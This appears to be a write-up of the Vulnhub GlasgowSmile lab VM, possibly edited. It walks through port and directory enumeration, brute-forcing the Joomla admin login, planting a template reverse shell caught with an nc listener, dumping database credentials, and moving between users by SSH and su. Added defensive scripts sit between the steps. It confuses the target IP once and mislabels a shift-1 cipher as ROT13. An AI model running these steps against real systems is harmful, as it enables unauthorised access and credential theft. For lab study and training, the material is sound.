Vulnhub GlasgowSmile machine test process (partial)

GlasgowSmile

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24   |   Screen View: Unique Hosts                                                                                            
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.1.1.1        00:50:56:c0:00:01      1      60  VMware, Inc.                                                                                             
 10.1.1.148      00:0c:29:e1:23:04      1      60  VMware, Inc.                                                                                             
 10.1.1.254      00:50:56:ee:66:c6      1      60  VMware, Inc.            

Using the Netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 10.1.1.254.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.148 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-23 05:54 EST
Nmap scan report for 10.1.1.148
Host is up (0.0063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6734481f250ed7b3eabb361122608fa1 (RSA)
|   256 4c8c4565a484e8b1507777a93a960631 (ECDSA)
|_  256 09e994236097f720cceed6c19bda188e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E1:23:04 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds

The Nmap scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ ls
joker.jpg  nmap_full_scan
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ steghide extract -sf joker.jpg                         
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ stegseek joker.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.37% (132.6 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ exiftool joker.jpg   
ExifTool Version Number         : 12.49
File Name                       : joker.jpg
Directory                       : .
File Size                       : 263 kB
File Modification Date/Time     : 2023:02:23 05:56:51-05:00
File Access Date/Time           : 2023:02:23 05:57:08-05:00
File Inode Change Date/Time     : 2023:02:23 05:56:51-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 96
Y Resolution                    : 96
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ nikto -h http://10.1.1.148
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.148
+ Target Hostname:    10.1.1.148
+ Target Port:        80
+ Start Time:         2023-02-23 08:18:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7d, size: 5a7fbb701d4b6, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7889 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-02-23 08:19:12 (GMT-5) (68 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ gobuster dir -u http://10.1.1.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.148
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,txt,html,sh
[+] Timeout:                 10s
===============================================================
2023/02/23 08:20:30 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 125]
/joomla               (Status: 301) [Size: 309] [--> http://10.1.1.148/joomla/]
/how_to.txt           (Status: 200) [Size: 456]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1098668 / 1102805 (99.62%)
===============================================================
2023/02/23 08:22:06 Finished
===============================================================
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ curl http://10.1.1.148/how_to.txt

Hi Rob,
Forgive My Laughter. I Have A Condition

Take care


  ________     ____      __   ___    _____   ______    
 (___  ___)   / __ \    () ) / __)  / ___/  (   __ \   
     ) )     / /  \ \   ( (_/ /    ( (__     ) (__) )  
    ( (     ( ()  () )  ()   (      ) __)   (    __/   
 __  ) )    ( ()  () )  () /\ \    ( (       ) \ \  _  
( (_/ /      \ \__/ /   ( (  \ \    \ \___  ( ( \ \_)) 
 \___/        \____/    ()_)  \_\    \____\  )_) \__/  

Could Rob be a username?

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ dirb http://10.1.1.148

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Feb 23 08:24:09 2023
URL_BASE: http://10.1.1.148/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.1.1.148/ ----
+ http://10.1.1.148/index.html (CODE:200|SIZE:125)                                                                                                          
==> DIRECTORY: http://10.1.1.148/joomla/                                                                                                                    
+ http://10.1.1.148/server-status (CODE:403|SIZE:275)                                                                                                       
                                                                                                                                                            
---- Entering directory: http://10.1.1.148/joomla/ ----
==> DIRECTORY: http://10.1.1.148/joomla/administrator/    

Found the page:

http://10.1.1.148/joomla/administrator/index.php
                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ wfuzz -u http://10.1.1.148/joomla/cli/?FUZZ=id  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 2
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.1.1.148/joomla/cli/?FUZZ=id
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                     
=====================================================================


Total time: 0
Processed Requests: 220560
Filtered Requests: 220560
Requests/sec.: 0

Nothing gained so far.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ cewl http://10.1.1.148/joomla/ -w dict.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ wc -l dict.txt                            
165 dict.txt

The cewl tool produces a password wordlist; brute-force the login with Burp Suite Intruder. Assuming the username is joomla, the password cracks as Gotham. Log in to the administrator backend.

Go to Extensions -> Templates -> Templates -> beez3 and upload a reverse shell.

Click Template Preview.
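As an added defensive note (not part of the original post): the Intruder run above produces a burst of POST requests to /joomla/administrator/index.php from a single client, which is easy to spot in the web server log. The Python script below, written for this page and not the post's own tooling, parses Apache combined-log lines and flags any source that sends at least 10 login POSTs within a 60-second window. The log lines, the client IPs and the 303 status code are constructed sample data.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Joomla's backend login form posts to this path.
LOGIN_PATH = "/joomla/administrator/index.php"

# Apache combined log format: client, ident, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def login_attempts_by_ip(lines):
    """Collect timestamps of POSTs to the admin login path, grouped by client IP."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method == "POST" and path.split("?")[0] == LOGIN_PATH:
            attempts[ip].append(ts)
    return attempts


def max_in_window(times, window):
    """Largest number of events that fall inside any sliding window of length `window`."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Map each client IP that reaches `threshold` login POSTs within the window to its peak count."""
    flagged = {}
    for ip, times in login_attempts_by_ip(lines).items():
        n = max_in_window(times, timedelta(seconds=window_seconds))
        if n >= threshold:
            flagged[ip] = n
    return flagged


def _line(ip, second, method, path, status):
    # Constructed combined-log line; the date and status value are sample data.
    return (f'{ip} - - [23/Feb/2023:08:40:{second:02d} -0500] '
            f'"{method} {path} HTTP/1.1" {status} 275 "-" "Mozilla/5.0"')


# Constructed sample: 15 login POSTs in 15 seconds from one client (the wordlist run),
# plus ordinary browsing and a single login from another client.
SAMPLE_LOG = [_line("10.1.1.143", s, "POST", LOGIN_PATH, 303) for s in range(15)]
SAMPLE_LOG += [
    _line("10.1.1.50", 3, "GET", "/joomla/", 200),
    _line("10.1.1.50", 20, "POST", LOGIN_PATH, 303),
    _line("10.1.1.50", 45, "GET", LOGIN_PATH + "?option=com_cpanel", 200),
]

if __name__ == "__main__":
    for ip, count in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} admin login POSTs within 60s")
```

The window logic is independent of the status code, so it works whether the login failure is rendered as a 200 with an error banner or as a redirect; on a real host, point it at the access log and tune the threshold to normal admin activity.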

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo nc -nlvp 5555                                     
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.148] 53102
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 07:56:21 up  3:06,  0 users,  load average: 0.00, 0.05, 0.31
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

www-data@glasgowsmile:/var/www/joomla2$ cat configuration.php
cat configuration.php
<?php
class JConfig {
        public $offline = '0';
        public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
        public $display_offline_message = '1';
        public $offline_image = '';
        public $sitename = 'Joker';
        public $editor = 'tinymce';
        public $captcha = '0';
        public $list_limit = '20';
        public $access = '1';
        public $debug = '0';
        public $debug_lang = '0';
        public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'joomla';
        public $password = 'babyjoker';
        public $db = 'joomla_db';

MariaDB [batjoke]> select * from taskforce;
select * from taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type    | date       | name    | pswd                                         |
+----+---------+------------+---------+----------------------------------------------+
|  1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                             |
|  2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                             |
|  3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                         |
|  4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                         |
|  6 | Soldier | 2020-06-14 | rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
|  7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                 |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.000 sec)


┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d
???AllIHaveAreNegativeThoughts???                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'YmFuZWlzaGVyZQ==' | base64 -d                            
baneishere                                                                                                                                                             
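Added example (not from the original post): the taskforce table stores its passwords as plain base64, which is a reversible encoding rather than a hash, so anyone who can read the table has every password at once. The script below audits the rows copied from the MariaDB output above, flags every value that decodes to printable text, and shows what the same column would look like with a salted scrypt hash that can be verified but not reversed. The hash string format and the scrypt parameters are this example's own choices.

```python
import base64
import binascii
import hashlib
import hmac
import os

# Copy of the (name, pswd) pairs from the taskforce table shown in the post.
TASKFORCE_ROWS = [
    ("Bane", "YmFuZWlzaGVyZQ=="),
    ("Aaron", "YWFyb25pc2hlcmU="),
    ("Carnage", "Y2FybmFnZWlzaGVyZQ=="),
    ("buster", "YnVzdGVyaXNoZXJlZmY="),
    ("rob", "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/"),
    ("aunt", "YXVudGlzIHRoZSBmdWNrIGhlcmU="),
]

# scrypt cost parameters chosen for this example (16 MiB of memory per hash).
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def reversible_secret(value):
    """Return the decoded text if `value` is strict base64 of printable UTF-8, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def audit_rows(rows):
    """Map every account whose stored 'password' is recoverable by decoding to the recovered text."""
    found = {}
    for name, stored in rows:
        plain = reversible_secret(stored)
        if plain is not None:
            found[name] = plain
    return found


def hash_password(password, salt=None):
    """Salted scrypt hash encoded as 'scrypt$<salt b64>$<digest b64>' (format chosen here)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.scrypt(password.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P)
    return "scrypt$" + base64.b64encode(salt).decode() + "$" + base64.b64encode(digest).decode()


def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time."""
    try:
        algo, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.scrypt(password.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P)
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    recovered = audit_rows(TASKFORCE_ROWS)
    print(f"{len(recovered)} of {len(TASKFORCE_ROWS)} stored values decode to a readable password")
    rehashed = hash_password(recovered["rob"])
    print("stored instead as:", rehashed)
    print("verifies:", verify_password(recovered["rob"], rehashed))
    print("reversible after rehash:", reversible_secret(rehashed))
```

Run against the six rows, the audit recovers every password; after rehashing, the stored string is no longer recoverable by decoding, and only the verify routine (which needs the candidate password) can confirm it.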
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ ssh rob@10.1.1.148                                                         
The authenticity of host '10.1.1.148 (10.1.1.148)' can't be established.
ED25519 key fingerprint is SHA256:bVGopxZOACv+Dy/jm+EmAyAQm+YSDTmVK1pVrNUz+P8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.1.148' (ED25519) to the list of known hosts.
rob@10.1.1.148's password: 
Permission denied, please try again.
rob@10.1.1.148's password: 
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$ id
uid=1000(rob) gid=1000(rob) groups=1000(rob),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
rob@glasgowsmile:~$ 

Privilege escalation

Decode it with CyberChef: the encoding is ROT13. Running ROT13 Brute Force first gives amount=1, with which the decode succeeds:

Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't."
Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==

This yields abner's password.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==' | base64 -d
I33hope99my0death000makes44more8cents00than0my0life0         
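Added example (not from the original post): what CyberChef's ROT13 Brute Force does here is try all 26 letter shifts of the text in rob's Abnerineedyourhelp file and let the operator pick the readable one. The script below automates that by scoring each shift against a small list of common English words, recovers amount=1, and then base64-decodes the last token of the recovered plaintext to get the password. The ciphertext is copied from the file as it is shown later in the post; the word list is this example's own.

```python
import base64
import re

# Copy of rob's Abnerineedyourhelp file as printed in the post (two lines).
CIPHERTEXT = (
    'Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. '
    'Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, '
    '"Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm\'s."\n'
    'Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. '
    'RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ=='
)

# Small scoring vocabulary chosen for this example; any common-word list works.
COMMON_WORDS = {"the", "and", "you", "his", "this", "need", "help", "hello",
                "find", "way", "use", "password", "from", "about", "will"}


def rotate(text, amount):
    """Shift letters forward by `amount` within the alphabet; digits and punctuation stay
    unchanged, which is exactly why the base64 tail survives the shift (CyberChef semantics)."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + amount) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + amount) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def score(text):
    """Number of dictionary hits among the words of `text`."""
    words = re.findall(r"[a-z]+", text.lower())
    return sum(1 for w in words if w in COMMON_WORDS)


def find_shift(ciphertext):
    """Brute force all 26 shifts and return the one whose output reads most like English."""
    return max(range(26), key=lambda k: score(rotate(ciphertext, k)))


def decode_message(ciphertext):
    """Undo the letter shift, then base64-decode the final token of the plaintext."""
    plaintext = rotate(ciphertext, find_shift(ciphertext))
    token = plaintext.split()[-1]
    return base64.b64decode(token).decode()


if __name__ == "__main__":
    k = find_shift(CIPHERTEXT)
    print("best shift:", k)
    print(rotate(CIPHERTEXT, k))
    print("decoded token:", decode_message(CIPHERTEXT))
```

Because only letters are rotated, the base64 alphabet's digits, '+', '/' and '=' padding pass through unchanged; that is what makes the shifted tail still look like base64 and is the clue that a letter-only substitution was applied on top of the encoding.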
                                                                                                                                                            
rob@glasgowsmile:~$ ls -alh
total 52K
drwxr-xr-x 3 rob  rob  4.0K Jun 16  2020 .
drwxr-xr-x 5 root root 4.0K Jun 15  2020 ..
-rw-r----- 1 rob  rob   454 Jun 14  2020 Abnerineedyourhelp
-rw------- 1 rob  rob     7 Feb 23 04:50 .bash_history
-rw-r--r-- 1 rob  rob   220 Jun 13  2020 .bash_logout
-rw-r--r-- 1 rob  rob  3.5K Jun 13  2020 .bashrc
-rw-r----- 1 rob  rob   313 Jun 14  2020 howtoberoot
drwxr-xr-x 3 rob  rob  4.0K Jun 13  2020 .local
-rw------- 1 rob  rob    81 Jun 15  2020 .mysql_history
-rw-r--r-- 1 rob  rob   807 Jun 13  2020 .profile
-rw-r--r-- 1 rob  rob    66 Jun 15  2020 .selected_editor
-rw-r----- 1 rob  rob    38 Jun 13  2020 user.txt
-rw------- 1 rob  rob   429 Jun 16  2020 .Xauthority
rob@glasgowsmile:~$ cat user.txt
JKR[f5bb11acbb957915e421d62e7253d27a]
rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
rob@glasgowsmile:~$ 

rob@glasgowsmile:~$ su - aber
su: user aber does not exist
rob@glasgowsmile:~$ su - abner
Password: 
abner@glasgowsmile:~$ id
uid=1001(abner) gid=1001(abner) groups=1001(abner)
abner@glasgowsmile:~$ sudo -l
-bash: sudo: command not found
abner@glasgowsmile:~$ ls -alh
total 44K
drwxr-xr-x 4 abner abner 4.0K Jun 16  2020 .
drwxr-xr-x 5 root  root  4.0K Jun 15  2020 ..
-rw------- 1 abner abner  167 Feb 23 04:50 .bash_history
-rw-r--r-- 1 abner abner  220 Jun 14  2020 .bash_logout
-rw-r--r-- 1 abner abner 3.5K Jun 14  2020 .bashrc
-rw-r----- 1 abner abner  565 Jun 16  2020 info.txt
drwxr-xr-x 3 abner abner 4.0K Jun 14  2020 .local
-rw-r--r-- 1 abner abner  807 Jun 14  2020 .profile
drwx------ 2 abner abner 4.0K Jun 15  2020 .ssh
-rw-r----- 1 abner abner   38 Jun 16  2020 user2.txt
-rw------- 1 abner abner  399 Jun 15  2020 .Xauthority
abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
abner@glasgowsmile:~$ cat info.txt
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile.
The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly.
The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").

Successfully logged in as abner and tried several privilege-escalation approaches; none was exploitable. There is also a penguin directory under /home that cannot be opened, but the command history shows that a .dear_penguins.zip was unzipped.

posted @ 2023-02-23 22:24  Jason_huawen